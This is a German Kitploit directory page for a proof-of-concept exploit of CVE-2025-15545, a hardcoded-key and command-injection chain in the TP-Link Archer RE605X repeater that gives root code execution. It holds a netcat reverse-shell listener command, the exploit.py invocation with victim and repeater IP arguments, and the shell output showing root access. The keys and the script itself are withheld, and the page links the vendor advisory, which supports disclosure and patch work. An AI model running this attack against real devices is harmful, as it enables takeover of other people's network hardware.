Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-15545 — Proof of Concept für CVE-2025-15545 | Kitploit
Tools/GitHubGitHub/xernary/cve-2025-15545
Embedded-System-SicherheitIoT-SicherheitSchwachstellenanalyseExploitationReverse EngineeringCommand and Control
GitHubxernary/cve-2025-15545

CVE-2025-15545

Proof of Concept für CVE-2025-15545

Repository anzeigen
12vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2025-15545

Informationen

Hersteller: TP-Link
Website des Herstellers: TP-Link
Modell: Archer RE605X
Hardware-Version: RE605X v3.0
Firmware-Version: RE605X(EU)_V3_1.1.5 Build 20240905
Firmware-Downloadadresse: TP-Link

Eine Kette von Schwachstellen — einschließlich der Verwendung hartkodierter kryptografischer Schlüssel und einer Befehlsinjektion in der Komponente des XML-Konfigurationsparsers — ermöglicht es einem lokal authentifizierten Angreifer, entfernte Codeausführung (RCE) als Root auf dem Gerät zu erreichen.

PoC-Anforderungen

Hinweis: Das Proof-of-Concept exploit.py demonstriert ein verkettetes Angriffsszenario und stützt sich als zusätzliche Voraussetzung auf die Anmeldeinformationen eines authentifizierten Benutzers. Dieser Authentifizierungsschritt wird nicht von CVE-2025-15545 abgedeckt und dient nur Demonstrationszwecken.

  • Sowohl der Angreifer als auch das Opfer müssen mit dem lokalen Netzwerk des Repeaters verbunden sein.
  • Das Opfer muss am Web-Kontrollpanel des Repeaters authentifiziert sein.

Verwendung

Lauschen Sie auf eingehende Verbindungen in einem separaten Terminal:

root@kitploit:~
$ nc -lvnp 4444

Führen Sie das Skript exploit.py aus:

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

Hinweis: aes_key und aes_iv sind die hartkodierten kryptografischen Schlüssel, die vom Gerät zur Ver- und Entschlüsselung von Konfigurationsdateien verwendet werden, und sie werden für dieses Proof-of-Concept benötigt. Aus Sicherheitsgründen können sie hier nicht geteilt werden.

Die Reverse-Shell wird auf dem ersten Terminal empfangen:

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

Referenzen

Diese Schwachstellen wurden von Nicola Giuffrida gemeldet.

  • Vollständiger Artikel: https://nico-security.com/posts/cve-2025-15545
  • CVE-Eintrag: https://www.cve.org/cverecord?id=CVE-2025-15545
  • TP-Link-Sicherheitshinweis: https://www.tp-link.com/us/support/faq/4929
Tool herunterladen